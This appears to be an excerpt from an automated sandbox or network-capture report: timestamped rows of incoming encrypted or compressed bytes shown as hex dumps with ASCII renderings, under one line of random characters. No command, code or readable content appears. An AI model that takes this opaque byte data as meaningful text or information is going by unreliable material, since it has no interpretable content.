Mbb%1Tnjoph8~w<ag`zf-Y&DD!-_78N5`\|Tfk/bjl}O.DB[Cm}.iQ%czS2^FdJ~>MnAHks`6Q^K+?g9!;a%
2023-09-07 07:31:08 UTC	302	IN	Data Raw: 92 74 be 95 03 eb 89 98 b0 3b f7 66 08 d6 9e 63 d0 bb 04 df d3 31 13 ba 11 d4 1b 97 04 ef 2c 42 51 43 13 52 71 d9 ca f0 15 ba b3 16 6d 31 99 07 c9 bf f4 46 58 bf be 71 e0 08 eb 13 5a 28 6d 0c 43 0b 3f a3 a6 6e ee 6d 11 bc 36 29 bf cc 85 c8 d6 ba 10 0b 0f 7e 24 26 34 6b 42 f6 42 d5 96 fb b1 d4 5d 3b 9d 1f 97 71 f6 9a 26 c6 3c d2 22 28 68 97 0e 16 57 44 10 27 da fd 75 4d 14 7e 25 a2 6d e4 02 4b 92 4b 95 ba 62 30 a4 87 86 f5 1d 9b 41 1f fb 4d 00 ae 77 4c 96 49 75 44 fc 13 03 fe f7 fa 03 64 c1 3a a1 7b 0b 05 01 f1 59 1c 2d 2f 7d f6 2e 63 0b ce 8c 18 de 94 8c e2 8c 84 c1 2e e9 25 0d da 63 f8 76 08 ef aa ca 88 e5 43 88 3d 2a 81 bf 48 6e cb f1 52 51 f6 27 c3 e1 8e 8b 2d 99 17 08 ab 3f 70 8c 46 90 6b 11 b5 31 2b 0f a6 5a 00 82 0f 52 3b b9 e1 39 66 00 a0 6a 11 20 Data Ascii: t;fc1,BQCRqm1FXqZ(mC?nm6)~$&4kBB];q&<"(hWD'uM~%mKKb0AMwLIuDd:{Y-/}.c.%cvC=*HnRQ'-?pFk1+ZR;9fj
2023-09-07 07:31:08 UTC	303	IN	Data Raw: 5f 1a b5 8c 71 56 94 35 ab 0f 37 9d 74 17 c4 90 bc d8 73 4a 4b ae 41 d1 1b 34 b0 ef 29 8f 53 ad 54 59 a6 a4 a1 50 d6 2a 00 7b fc 0e bf 7e 3c aa 88 53 06 49 9d 24 94 f1 01 ae d9 09 16 a9 f2 84 38 ad c9 f3 e5 9f ff 98 49 e2 1d 80 67 e4 55 95 3a 32 7a d7 97 d4 11 97 c8 3f fe 25 4a cf 4e ae 77 da 5a 5f ae ac 76 d2 15 d8 01 c3 16 55 e6 26 17 11 a6 d4 bd 92 d0 23 4e 83 73 7e 3e f6 65 a8 27 e7 7b ac d6 ab 7d 2f 7f 48 59 a0 73 2b f9 9b b4 24 54 06 c1 cf d1 c9 5a 97 85 40 26 6b a2 57 66 24 49 a6 b9 ba d8 24 ab 73 72 0d fc c6 a2 6b a0 81 22 b5 85 42 79 c4 13 ff 54 03 58 c5 34 38 32 06 52 22 44 fb 51 ea 3d cc 3e 41 01 00 e7 43 6b bd 9e 70 68 4f 2f 38 a6 ed 19 cb 09 c8 3c fc 1f cf b1 89 f3 13 3f 8d 0b 9c 32 10 b9 a9 5a b7 7c d8 79 52 59 ef 8c 9c 9d cb 70 7a 5a 12 34 Data Ascii: _qV57tsJKA4)STYP*{~<SI$8IgU:2z?%JNwZ_vU&#Ns~>e'{}/HYs+$TZ@&kWf$I$srk"ByTX482R"DQ=>ACkphO/8<?2Z\|yRYpzZ4
2023-09-07 07:31:08 UTC	304	IN	Data Raw: 38 6f b5 e8 c7 ad 0e 3f 0d 07 0a 22 05 e6 78 47 f6 f4 eb c7 c9 2f 39 13 ca 00 05 55 d0 21 9e e7 ca 2f 80 ed 09 20 bb 79 2d 6a 7a c2 95 6f 44 4c f1 3d 49 2f 93 2a 17 18 02 77 98 fd 05 11 b0 09 8f de c2 f8 78 bb e2 6a f7 54 65 9c 9c c0 88 07 9d 86 d5 01 02 aa d5 82 1d e3 91 dd 18 60 f2 fc 02 e1 66 f1 99 0b ef d3 94 02 61 a8 b6 72 38 be 55 54 b2 4e 3c 39 59 79 cf 4f 54 a4 6a dd e1 d1 9b 4c 1c 56 1e 9b 15 21 9e 2a 0b 91 a2 43 69 e7 71 b0 8e 58 8c 80 92 ae d7 50 bb 85 20 55 8d ef df 0b fd 8c f8 2b 64 14 63 44 8e 11 61 8b 68 8c a3 58 d9 69 0c 97 45 c2 7a 73 38 f7 3e 40 cb 0b 5d cc 94 d2 9d 99 bc 47 91 75 50 37 9c 1c 3a 5b 3c b1 d0 a6 0b 52 eb e5 9d c6 b7 1d c0 c5 f7 ee 1d 54 cf 91 ea c2 f9 bc 3d 8d 99 ad 05 65 8c 26 48 40 4f 0c 90 06 e7 3e ac db 00 6d b0 e8 fc Data Ascii: 8o?"xG/9U!/ y-jzoDL=I/wxjTe`far8UTN<9YyOTjLV!CiqXP U+dcDahXiEzs8>@]GuP7:[<RT=e&H@O>m
2023-09-07 07:31:08 UTC	305	IN	Data Raw: ef b0 c8 97 39 ed 1c bb 85 fb 3b a7 20 05 1a cc cb 0f c5 cc 39 2e a5 0a 9d d5 91 03 cc 8b 57 17 94 c7 aa 2c 7d f6 37 a4 21 86 70 79 0f de b6 de 9a e5 f2 c5 45 58 cc e0 f7 c5 37 55 0a 47 ce 61 5b 44 39 ff e7 b8 9f 9a 98 e9 0c 14 18 57 fa ed 88 4c d5 67 c8 46 ef f7 ff b9 65 3d c7 cf 4f e8 f8 de f5 7a a7 c3 59 62 f1 6e 45 9e e6 ce 11 33 3b 18 5a 03 bc fb 09 64 e8 6f 60 7d cf 8b df c4 7a d6 c5 cb 01 83 a9 7e 91 ad 85 db e3 85 fa 10 45 af db 0f a4 9b 23 7f 12 af d1 44 6c 78 bf 25 a2 24 d4 29 1a e5 57 f6 82 fd b2 53 82 e0 e8 11 a3 5f ac da 35 2a 27 5a 6a d5 f8 5f e6 08 bd 25 3d aa 43 38 26 48 ad a9 f3 bb d6 bc dc 5e 92 c1 a4 0f f4 ac 1c c1 94 7f Data Ascii: 9; 9.W,}7!pyEX7UGa[D9WLgFe=OzYbnE3;Zdo`}z~E#Dlx%$)WS_5*'Zj_%=C8&H^
2023-09-07 07:31:08 UTC	306	IN	Data Raw: 68 18 7c dc 8a 96 0c 70 f9 e8 4e 28 89 16 9f 31 40 d6 52 40 ad ae ac 73 31 ac 74 02 f0 55 ad 27 06 7b b1 95 4d 11 c0 5a a2 a6 f4 8e d1 e5 83 ea fd 3a 7b 19 e7 00 12 53 a2 a2 35 eb f3 02 00 b8 75 a4 36 7d 40 b5 1c 0f e2 1c b3 96 c0 fa 1c e3 3d 21 4b 3f 14 c1 f3 91 0e 7e 26 ab 69 51 45 c6 c2 b8 c6 56 07 bd 5c e0 a5 96 6e e3 29 ad d0 6c 75 bf 17 1d c7 89 c4 28 1a e3 d6 cb 4e 33 6f 1c 5e c9 ad 3a 07 09 07 09 21 05 e6 78 47 f6 f4 cf ee cc 2f 8b d1 db 00 c3 8c c3 21 da ad cd 2f 80 ed 09 20 bb 79 2d 6a 7a c2 95 6f 44 4c f1 3d 49 2f 93 2a 17 18 02 77 98 fd 05 11 b0 09 8f de c2 f8 78 bb e2 6a f7 54 65 9c 9c c0 88 07 9d 86 d5 01 02 aa d5 82 1d e3 91 dd 18 60 f2 fc 02 e1 66 f1 99 0b ef d2 95 03 60 a9 b7 73 39 bf 54 54 e1 14 34 39 88 9a dd 4f 98 7a 78 dd 44 60 96 4d Data Ascii: h\|pN(1@R@s1tU'{MZ:{S5u6}@=!K?~&iQEV\n)lu(N3o^:!xG/!/ y-jzoDL=I/*wxjTe`f`s9TT49OzxD`M
2023-09-07 07:31:08 UTC	307	IN	Data Raw: 99 94 f4 d0 9d 95 05 79 52 74 69 e4 96 30 2a 8a b9 db 39 4b f7 20 bb 12 76 d3 20 bf 92 5b 74 43 a5 97 26 bd 6d 7d a2 af eb d1 f5 83 2e f1 69 e8 a7 51 af f8 25 d9 63 7a ce 0b 1e e4 cb d6 e2 b8 93 53 c7 8b 32 bf b5 5e 46 e4 64 8f f1 a6 0d a7 4a ac ff 0e 0e 7e a2 3e 4d 8d 57 8c bb de 2e 6e ef ff 6c 0a 02 23 77 2f 09 ca cf bc 3c 32 19 73 58 e5 50 11 ea 98 f0 bc 65 fd 2b e0 05 e7 b0 cd 93 3d ed 1c be 80 fb 3b c4 4a 0d 1a 06 16 1c c5 a6 4c 25 a5 0d 9a d5 91 03 cc 8b 57 17 94 c7 aa 6d 3a f1 37 63 f7 96 70 cf c9 cf b6 f3 ab e0 f2 c5 45 58 cc e0 f7 c5 37 55 0a 47 c6 6a 5b 44 b7 65 eb b8 4f 78 8b e9 75 97 12 57 ff e8 88 4c d5 67 c8 46 ef f7 ff b9 65 3d c7 cf 4f e8 f8 de f5 7a a7 c3 59 62 f1 6e 45 9e e6 ce 11 33 3b 18 5a 03 bc fb 09 64 e8 6f 60 7d cf 8b df c4 7a d6 Data Ascii: yRti0*9K v [tC&m}.iQ%czS2^FdJ~>MW.nl#w/<2sXPe+=;JL%Wm:7cpEX7UGj[DeOxuWLgFe=OzYbnE3;Zdo`}z
2023-09-07 07:31:08 UTC	308	IN	Data Raw: f6 9a 26 c3 39 d4 22 3f 71 8a 0e 0a 48 67 10 3b c5 de 75 76 2a 3f 25 51 9e 10 02 b4 6d b4 95 45 9d cf a6 78 79 0a a6 67 bd e4 04 b7 f9 56 88 b6 6f b1 8a d0 6f 80 fc fe f7 fa fc 64 c1 3a 5e 7b 0b 05 b6 f1 59 1c 2d 2f 7d f6 2e 63 0b ce 8c 18 de 94 8c e2 8c 84 c1 2e e9 25 0d da 63 f8 76 08 ef aa ca 88 e5 43 88 3d 2a 81 3a 48 6e cb 0e 52 51 f6 d8 86 a5 cd 74 c8 7b c9 f7 4e dd ae 73 a0 73 b4 ee 4e ca d1 47 59 a5 ff 82 f0 ad c4 b9 8a 52 0a 00 a5 6f 17 20 16 0d 14 18 03 ed 8c 53 e6 7d 92 ea bf 2b 1f 57 fb 5c 1d 7b fd 81 ba 0e 59 ee 64 72 7d e3 f3 36 50 71 24 63 14 bf 9c b2 be fb 18 04 9f a4 7a b3 f6 b7 7a c3 00 f1 67 cf 55 13 a2 9d f8 c9 9d 7f ba 9b b4 8d b0 19 87 f0 32 bb d1 f6 aa 86 1e 54 c7 66 88 bf d4 d0 8e 73 9c 77 63 e9 09 d2 55 ba 54 1b 20 4d 6e 22 9a 71 Data Ascii: &9"?qHg;uv?%QmExygVood:^{Y-/}.c.%cvC=:HnRQt{NssNGYRo S}+W\{Ydr}6Pq$czzgU2TfswcUT Mn"q
2023-09-07 07:31:08 UTC	309	IN	Data Raw: 15 d8 01 c3 16 55 e6 26 17 11 a6 d4 bd 92 d0 23 4e 83 73 7e 3e f6 65 a8 27 e7 7b ac d6 ab 7d 2f 7f 48 59 a0 73 2b f9 90 b9 2a 54 13 d6 d4 d1 dc 4d 8c 85 34 50 13 a2 a8 99 db 49 59 46 45 d8 db 54 8c 3a f0 00 3a 5d 90 5b 7b dd 4e 7e b8 86 51 87 6b ab 03 58 c5 cb 38 32 06 ad 22 44 fb e6 ea 3d cc 3e 41 01 00 e7 43 6b bd 9e 70 68 4f 2f 38 a6 ed 19 cb 09 c8 3c fc 1f cf b1 89 f3 13 3f 8d 0b 9c 32 10 b9 a9 ed b7 7c d8 86 52 59 ef 73 17 17 43 8f 96 b0 f5 cb d4 a1 de 5c 06 01 bb 0a 0b f7 c3 35 ce dd bd 78 d5 33 7c a9 b0 03 22 14 bb 48 97 55 b1 99 df 87 9e a3 44 e3 1f 74 46 e4 7e a1 92 58 d8 74 04 99 de 6c ad 68 8e 3c b2 ad ad cb 7c 42 5d 9b 31 b4 ac 5f c3 60 85 74 89 0d 6f 87 0e ab e7 11 dc b8 1a 6f fe 40 d6 86 93 75 bf 94 02 ea 88 99 b1 3a f6 67 09 d7 9f 62 d1 ba Data Ascii: U&#Ns~>e'{}/HYs+*TM4PIYFET::][{N~QkX82"D=>ACkphO/8<?2\|RYsC\5x3\|"HUDtF~Xtlh<\|B]1_`too@u:gb
2023-09-07 07:31:08 UTC	310	IN	Data Raw: 4c 10 60 9e 8d 74 39 7b 83 45 b3 15 5f 30 58 7b cd 4d 55 a6 68 df e0 d1 9b 4f 1d 69 5e 9f 15 8d 21 27 0b 23 1f 51 69 aa 26 b5 8e 5d 89 83 92 8e f0 51 bb 91 3a 55 8d ed dd 09 fd 8e fa 29 64 16 61 46 8e 1b 6a 82 68 81 b0 49 d9 64 1f 86 45 b1 0a 05 38 0a c3 bd cb f6 a0 31 94 2f 60 64 f4 ba 6c 89 af cb 60 e0 c5 a7 c0 4d 2f 33 9e c7 14 e5 9d c6 48 1d c0 c5 08 ee 1d 54 78 91 ea c2 f9 bc 3d 8d 99 ad 05 65 8c 26 48 40 4f 0c 90 06 e7 3e ac db 00 6d b0 e8 fc 42 0a 51 a0 7e a1 c4 aa 94 9f 55 27 f8 af f4 d1 6d 4c f1 ce 22 99 f3 c5 06 85 4f dd be ba a7 f6 c4 3d 81 22 db ff de e6 19 4d 84 f9 60 2d f1 ae 80 59 9f 37 c9 fa 59 9d 17 5f e0 ce 6b 03 a1 17 2b 23 af f0 ce f1 90 c2 5f b8 66 7d e3 f1 3c 08 6d 66 85 44 38 06 5d 1b b7 8e 73 57 96 37 a9 0e 35 9f 76 16 c6 92 be d9 Data Ascii: L`t9{E_0X{MUhOi^!'#Qi&]Q:U)daFjhIdE81/`dl`M/3HTx=e&H@O>mBQ~U'mL"O="M`-Y7Y_k+#_f}<mfD8]sW75v
2023-09-07 07:31:08 UTC	312	IN	Data Raw: f2 6d 45 9d e5 cd 11 30 38 1b 5a 00 bf f8 09 67 eb 6c 60 7e cc 88 df c7 79 d5 c5 c9 03 81 a8 4a a9 aa 84 59 5a 9f fb 88 c7 b5 da 9e 06 94 22 61 0e ae d0 0b 3a 7d be bd 07 28 d4 e6 c6 f5 57 34 50 ee b2 0e e7 eb e8 1b a8 5c ac d8 37 28 27 58 68 d7 f8 5d e4 0a bd 27 3f a8 43 3a 24 4a ad ad f6 b1 d6 b5 d2 52 92 c8 aa 03 f4 c1 71 b2 94 82 95 e5 7c 21 77 6b 0c 8d 04 15 06 d5 74 eb 60 cc bd 2b ad bd 50 53 53 e5 a7 39 8b 02 f0 55 52 27 06 7b 4e 95 4d 11 77 5a a2 a6 f4 8e d1 e5 83 ea fd 3a 7b 19 e7 00 12 53 a2 a2 35 eb f3 02 00 b8 75 a4 36 7d 40 b5 1c 0f e2 1c b3 96 c0 fa ab e3 3d 21 b4 3f 14 c1 0c 00 9e f1 d9 5e 9d a3 ba 33 36 4a 38 af fe 45 a2 1e 5b 68 27 1d d7 53 d1 92 8b 41 16 75 af e1 c5 03 36 e6 d7 56 e1 3f 6f b6 eb c4 ad 0d 3c 0e 07 09 21 06 e6 7b 44 f5 f4 Data Ascii: mE08Zgl`~yJYZ"a:}(W4P\7('Xh]'?C:$JRq\|!wkt`+PSS9UR'{NMwZ:{S5u6}@=!?^36J8E[h'SAu6V?o<!{D
2023-09-07 07:31:08 UTC	313	IN	Data Raw: 1c 56 d6 77 89 bd 77 63 83 71 4d 96 72 eb 62 a2 5c b8 54 19 22 4f 6e 20 98 73 d3 ed ea 94 71 12 61 19 f5 92 82 e1 01 8b 5f 5e cf 0e 37 06 c5 39 bd 79 be f9 f2 b5 0b 12 e4 2f b1 9c 4a 38 66 53 fa 81 fe 9d 2f e6 2c e0 d2 06 58 7c 1d a9 45 20 50 9d 45 3d b2 7d d3 15 2e 73 2d ab c3 68 38 b2 10 44 35 e5 9c ef 86 04 2e 3d 7c 51 03 a8 f3 ee 9a 97 f4 d3 9e 96 05 7a 51 77 69 e2 90 35 2a 81 b3 d2 39 40 fd 29 bb 7c 18 be 20 43 6e a7 74 bf 59 6b 26 41 91 81 ea 52 16 2c 0a 7e d3 0c 96 15 5a ac 50 6e b3 4f 9c 7a ce 0b e1 e4 cb d6 1d b8 93 53 70 8b 32 bf b5 5e 46 e4 64 8f f1 a6 0d a7 4a ac ff 0e 0e 7e a2 3e 4d 8d 57 8c bb de 2e 6e ef ff 6c 0a 02 23 77 2f 09 ca 78 bc 3c 32 e6 73 58 e5 af 83 78 09 0f 44 92 0b d4 18 f2 11 4e 36 69 c7 13 e2 40 7e b2 c5 3a b4 0c e4 f8 e8 1d Data Ascii: VwwcqMrb\T"On sqa_^79y/J8fS/,X\|E PE=}.s-h8D5.=\|QzQwi5*9@)\| CntYk&AR,~ZPnOzSp2^FdJ~>MW.nl#w/x<2sXxDN6i@~:
2023-09-07 07:31:08 UTC	314	IN	Data Raw: d9 bd 1a 6a fb 45 d6 83 96 70 bf 91 07 ef 88 9c b4 3f f6 62 0c d2 9f 67 d4 bf 05 db d7 35 12 be 15 d0 1a 93 00 eb 2d 46 55 47 12 56 75 dd cb f4 11 be b2 13 68 34 99 03 cd bb f5 42 5c bb bf 75 e4 0c ea 17 5e 2c 6c 08 47 0f 3e a7 a2 6a ef 69 15 b8 37 2d bb c8 84 cc d2 be 11 21 22 79 25 e9 d5 79 43 ec 5e d3 97 f2 bb d1 5c 7b d8 16 96 75 f2 9e 27 c7 3d d0 23 3b 75 8e 0f 0e 4c 63 11 3f c1 da 74 72 2e 3b 24 55 9a 14 03 b0 69 b0 94 41 99 cb a7 7c 7d 0e a7 60 ba e4 05 b6 fb 55 89 b7 6d b2 8b bf 07 e8 fd 05 0c 01 fd 9f 3a c1 5f 80 f0 fe ff 0c a4 e1 d3 d1 83 08 d0 9d f5 30 72 8e 48 02 72 e2 8c 84 3f 2e e9 25 f3 da 63 f8 c1 08 ef aa ca 88 e5 43 88 3d 2a 81 3a 48 6e cb 0e 52 51 f6 d8 86 a5 cd 74 c8 7b c9 f7 4e dd ae 73 a0 73 b4 ee 4e ca d1 f0 59 a5 ff 7d f0 ad c4 46 Data Ascii: jEp?bg5-FUGVuh4B\u^,lG>ji7-!"y%yC^\{u'=#;uLc?tr.;$UiA\|}`Um:_0rHr?.%cC=*:HnRQt{NssNY}F
2023-09-07 07:31:08 UTC	315	IN	Data Raw: 19 24 6f 40 af 6b 3a 21 75 2a b5 a8 58 79 94 11 83 21 37 be 53 3a c4 b3 9a f4 73 68 6e 84 41 f0 3f 1d b0 cf 0a a7 53 b2 76 7e a6 ba 81 75 d6 37 1f 5f fc 15 a1 5c 3c b0 96 72 06 50 81 3b 94 e9 1a b0 d9 1e 0c b5 f2 91 20 b6 c9 e7 f2 85 ff 8a 5d fb 1c 92 73 f3 55 85 28 27 7a d8 86 c7 11 9a c7 2e fe 29 44 df 4e a5 7b d4 5a 56 a4 a0 76 da 1c d2 01 c6 10 52 e6 23 12 17 a6 d1 bb 94 d0 83 e3 93 73 fa b1 f8 65 b9 34 e0 7a 23 4a a4 7d 28 77 4e 59 a5 76 2d f9 95 bc 2c 54 16 d3 d2 d1 d9 48 8a 85 31 55 15 a2 ad 9c dd 49 5c 43 43 d8 de 51 8a 3a f7 06 3f 5d 91 5a 78 dd 4f 7f bb 86 3e e9 06 ab f9 a2 3c cb c2 c8 ff ad d8 be 02 ae 17 c1 30 c1 be fe ff 18 bc 94 42 61 e6 fe d9 d0 38 a6 ed e6 cb 09 c8 c3 fc 1f cf 06 89 f3 13 3f 8d 0b 9c 32 10 b9 a9 ed b7 7c d8 86 52 59 ef 73 Data Ascii: $o@k:!u*Xy!7S:shnA?Sv~u7_\<rP; ]sU('z.)DN{ZVvR#se4z#J}(wNYv-,TH1UI\CCQ:?]ZxO><0Ba8?2\|RYs
2023-09-07 07:31:08 UTC	317	IN	Data Raw: 77 dd 02 c8 18 cf 54 1c c2 76 b4 16 39 b4 0f c1 f3 1e 0b d3 f4 f1 79 8e 3f e7 ea 21 2f 3b 38 ed 34 19 04 ab 2e 38 9f 19 34 36 81 13 f7 39 ba 87 d3 73 7b 1a 4d 7a 45 85 38 2e 48 e6 5a 39 16 d3 c9 64 99 1b e3 05 b1 f5 73 c7 c3 06 86 a2 e3 94 09 4d 64 60 60 d9 89 cb 51 94 d4 d5 d6 bf d4 7c e3 fa 90 23 e6 79 f3 02 fc f8 67 0f 67 12 ee 2c 6b 1a 61 57 49 6a 38 41 aa 4c b2 b1 c3 21 59 86 30 57 54 da 15 ca e1 c2 8a 5b 1c 7b 4d 89 15 85 28 29 0b 26 15 5a 69 af 2c be 8e 58 83 88 92 8b fa 5a bb 94 30 5e 8c e8 d7 02 fd 8b f0 22 64 13 6b 4d 8e 1e 60 89 68 84 ba 42 d9 61 15 8d 45 b4 00 0e 38 0f c9 b6 cb f3 aa 3a 94 2a 6a 6f f4 bf 66 83 af cf 6b ea c5 a3 cb 47 2f 5e fc a4 14 1d 6a 30 48 e5 37 33 08 16 ea a2 30 6a 11 39 06 43 c2 72 66 52 fa 9a 73 b0 de d6 b0 0c 90 06 18 Data Ascii: wTv9y?!/;84.8469s{MzE8.HZ9dsMd``Q\|#ygg,kaWIj8AL!Y0WT[{M()&Zi,XZ0^"dkM`hBaE8:*jofkG/^j0H730j9CrfRs
2023-09-07 07:31:08 UTC	318	IN	Data Raw: 09 0f 44 92 0b d4 18 f2 11 4e 36 69 c7 13 b5 40 7e 05 3a 3a b4 f3 1a f8 e8 c9 c4 58 b2 1c a4 f3 64 ec 90 fa 35 bc 56 e1 62 f0 ab 9b cc c6 36 d0 44 b0 71 ce c8 ce b7 da 82 eb f3 83 03 48 cd c7 d0 cd 36 55 0a 47 cf 0f 35 5d 38 09 11 8f 9e d1 d3 f8 0d 19 15 55 fb 04 61 7e d4 91 3e 71 ee 01 09 8e 64 8f 75 e9 4e e9 f9 df f4 0a d7 db 58 88 1b 5c 44 87 ff c9 10 33 3b 18 5b 07 b8 fb 08 60 ec 6f 61 79 cb 8b de bf 01 cc c4 3c f6 b5 a9 88 67 9a 85 7f 4e bb fa 20 64 85 db 63 fb ae 23 e1 88 87 d1 11 23 60 bf a7 1f 37 d4 ea d4 e5 57 3c 59 e0 b2 06 ee e5 e8 13 a1 52 ac d0 3e 26 27 50 61 d8 f9 55 ed 04 bd 2f 36 a6 43 32 2d 44 ad a5 ff bf d6 bd db 5c 92 c0 a3 0d f4 c9 78 bc 94 8a 9c eb 7c 29 7e 65 0c 85 0d 1b 06 dd 7d e5 60 c4 b4 25 ad b5 59 5d 53 86 c5 5f 8b f7 04 a6 52 Data Ascii: DN6i@~::Xd5Vb6DqH6UG5]8Ua~>qduNX\D3;[`oay<gN dc##`7W<YR>&'PaU/6C2-D\x\|)~e}`%Y]S_R
2023-09-07 07:31:08 UTC	319	IN	Data Raw: cd 74 c8 7b c9 f7 4e dd ae 73 a0 73 b4 ee 4e ca d1 f0 59 a5 ff 7d f0 ad c4 46 1e c6 99 ff 5f 95 ee df ec f4 ec e6 ff 11 77 ad 4f 83 6c 14 be d5 e1 a9 fb a2 e3 a1 fc 7f 44 56 58 10 9a 2a 7c 57 47 08 51 da 8f 5e 15 14 37 8f bf 70 93 35 9e 93 4d a6 f7 80 4d d6 01 c6 50 da 54 52 e3 8b f9 bc e8 57 bb 32 1d b7 b1 b3 2d cd 33 e3 89 d7 ab b1 29 41 d7 42 bc aa 76 58 b8 67 4c c4 20 f5 63 2b d5 8a 55 b1 8a 70 6f 88 30 4c d2 4b 4c ad 70 50 23 02 f4 a7 b7 f6 00 be 6a 49 ce 3b 02 11 c4 0c 88 6e bf cc c7 a2 0a b2 44 15 b0 33 e4 07 67 4f 96 ad ff 0e b3 b8 2d bc 9c 50 59 da b0 ec 44 02 76 b4 44 1e 95 56 d3 02 3b 69 2d a6 cf 79 38 bf 1c 55 35 e8 90 fe 86 09 22 2c 7c 5c 0f b9 f2 e3 96 86 f4 de 92 87 05 77 5d 66 69 ef 9c 24 2a 8c bf c3 39 4d f1 38 bb 71 14 af 20 4e 62 b6 74 Data Ascii: t{NssNY}F_wOlDVX\|WGQ^7p5MMPTRW2-3)ABvXgL c+Upo0LKLpP#jI;nD3gO-PYDvDV;i-y8U5",\|\w]fi$9M8q Nbt
2023-09-07 07:31:08 UTC	320	IN	Data Raw: 3e c8 03 e0 30 4e 76 0c ec c0 72 9d 0a a4 ef b9 a9 ed 48 7c d8 86 ad 59 ef 73 a0 17 43 8f 96 b0 f5 cb d4 a1 de 5c 06 01 bb 0a 0b f7 c3 82 ce dd bd 87 d5 33 7c 56 25 96 b6 eb 47 b4 6c aa 4a 62 25 79 63 5e b8 1d b6 8a b8 1a 7f 5f 6c a6 d8 8a fa 7a df 92 53 10 8f c2 4c d5 ac 35 82 3a 5c 65 cf cc ad a1 3d 18 84 8a 77 75 6e 79 f0 d3 e6 ef 22 c3 1b 91 00 3b d7 78 6d 0e be 6a fc 91 89 67 4f 41 f7 99 f7 ac 9e 9c 2f c1 04 20 2c 4b 13 45 ee ae 1b 68 fb 95 2c bd ae 39 13 ad 8e a3 ca 0f ea c0 b3 e8 93 4a 98 f8 36 c5 f4 b9 a7 c5 be 8e 1f 72 eb ec a5 52 6d f3 bc 71 3f 5c 59 14 ee 92 ee c6 36 d6 40 b6 85 37 29 c0 10 f4 f0 04 24 d9 cb 11 42 09 bd af 96 84 31 90 5d 28 88 07 97 62 e3 82 26 d0 2c cc 22 2c 64 92 0e 19 5d 7f 10 28 d0 c6 75 65 3f 27 25 42 8b 08 03 a7 78 ac 95 Data Ascii: >0NvrH\|YsC\3\|V%GlJb%yc^_lzSL5:\e=wuny";xmjgOA/ ,KEh,9J6rRmq?\Y6@7)$B1](b&,",d](ue?'%Bx
2023-09-07 07:31:08 UTC	321	IN	Data Raw: 20 16 11 fa b1 2e 6e 0d 27 18 43 da 68 78 52 e2 80 6d d9 af a5 ae f3 77 e3 06 c1 5b 2d f5 92 4f 17 03 bd f5 ae 5f 81 25 40 2e 6b 9f 55 27 07 af f4 d1 92 4c f1 ce 89 99 f3 c5 06 85 4f dd be ba a7 f6 c4 3d 81 22 db ff de 51 19 4d 84 06 60 2d f1 51 15 cc 0a c8 34 07 a4 62 eb a3 1c 30 96 fe 5c e9 c3 de 52 0e 0c 0c 6d 3c 9d 45 9b 83 21 0c c1 f6 af 9b 78 ba fa fb a0 e5 d4 73 8e a9 94 ca 54 f0 37 2f c6 a5 c4 91 bd d9 73 4a 4b ae 41 d0 1a 35 b0 f9 30 93 53 b4 48 78 a6 bd bd 71 d6 33 1c 5a fc 17 a3 5f 3c b3 94 72 06 50 81 05 94 e8 1d 8f d9 10 0a 88 f2 9d 24 8c c9 ea f9 be ff 80 54 c2 1c 99 7b c5 55 8c 26 13 7a ce 8b f5 11 8e d4 1e fe 3c 56 ee 4e b7 6b fb 5a 46 b2 8d 76 cb 09 f9 01 da 0a 74 e6 3f 0b 30 a6 cd a1 b3 d0 3a 52 a2 73 67 22 d7 65 b1 3b c6 7b b5 ca 8a 7d Data Ascii: .n'ChxRmw[-O_%@.kU'LO="QM`-Q4b0\Rm<E!xsT7/sJKA50SHxq3Z_<rP$T{U&z<VNkZFvt?0:Rsg"e;{}
2023-09-07 07:31:08 UTC	323	IN	Data Raw: 69 0c 8f 06 17 06 d7 76 e9 60 ce bf 29 ad bf 52 51 53 8c ce 53 8b fd 0f aa 52 d8 f9 84 4e 6a b2 ee 3f a5 5d 59 0b 71 2e 1a 7c 15 02 c5 84 e6 18 ff ed ac 5d 5d ca 14 0e ff fd 47 f7 26 b4 82 41 b4 1d f0 e2 1c b3 69 c0 fa ab 1c 3d 21 b4 5a 14 c1 0c 00 9e f1 d9 5e 9d a3 ba 33 36 4a 38 af fe 45 a2 1e 5b 68 90 1d d7 53 2e 92 8b 41 e9 e3 39 77 3a fd c8 18 28 ab 1c c2 91 4b 16 39 53 f0 c1 f3 f9 f4 dc fb 18 86 b9 08 0a 15 39 37 d1 c7 ed 34 fe fb ab 2e df 60 19 34 d1 7f 13 f7 de f8 87 d3 94 7b 3c 6b 91 45 b2 0f c3 48 87 3b 82 16 38 22 57 99 fe 06 12 b1 08 8e df c3 f9 79 ba e3 6b f6 55 64 9d 9d c1 89 06 9c 87 d4 00 03 ab d4 83 1c e2 90 dc 19 61 f3 fd 03 e0 67 f0 98 0a ee d3 94 02 61 a8 b6 72 38 be 55 54 b2 4e 3c 39 59 79 cf 4f 54 a4 6a dd e1 d3 99 4d 1c 6b 5c 9d 15 Data Ascii: iv`)RQSSRNj?]Yq.\|]]G&Ai=!Z^36J8E[hS.A9w:(K9S974.`4{<kEH;8"WykUdagar8UTN<9YyOTjMk\
2023-09-07 07:31:08 UTC	324	IN	Data Raw: 6a fa 79 ad 8b 96 e1 6c c9 d5 82 4f 2e c6 42 01 d5 44 7f e4 42 df 40 92 5b 8b bc a5 97 d9 42 6d 7d 15 50 eb d1 f5 7c 2e f1 69 17 a7 51 af 07 25 d9 63 85 ce 0b 1e 1b cb d6 e2 47 93 53 c7 74 32 bf b5 a1 46 e4 64 70 f1 a6 0d 58 4a ac ff f1 0e 7e a2 c1 4d 8d 57 50 bb de 2e 08 ef ff 6c 0c 02 23 77 2f 09 ca 78 bc 3c 32 e6 73 58 e5 af 83 78 09 0f 44 92 0b d4 18 f2 11 4e 36 69 c7 13 e2 40 7e 05 c5 3a b4 f3 e4 f8 e8 e2 3b 58 b2 db 5b f3 64 2b 6f fd 32 75 a9 e9 6a 39 54 93 c4 0f c9 9d 09 68 8e 31 37 31 48 0d 55 1e 0c 3b bb a6 32 1e 09 3b c9 ab f4 b9 30 9f a5 ba c7 01 19 46 61 64 66 17 f2 ea e6 a9 04 13 76 b2 2c 99 36 b8 55 09 01 47 1e c3 39 31 1b 16 06 20 a4 84 59 3d 08 9c 0f 90 14 60 18 30 40 cd c5 e6 0b fd 42 05 58 9a 16 91 31 83 31 75 8e 3a 84 28 94 34 fe 7c f9 Data Ascii: jylO.BDB@[Bm}P\|.iQ%cGSt2FdpXJ~MWP.l#w/x<2sXxDN6i@~:;X[d+o2uj9Th171HU;2;0Fadfv,6UG91 Y=`0@BX11u:(4\|
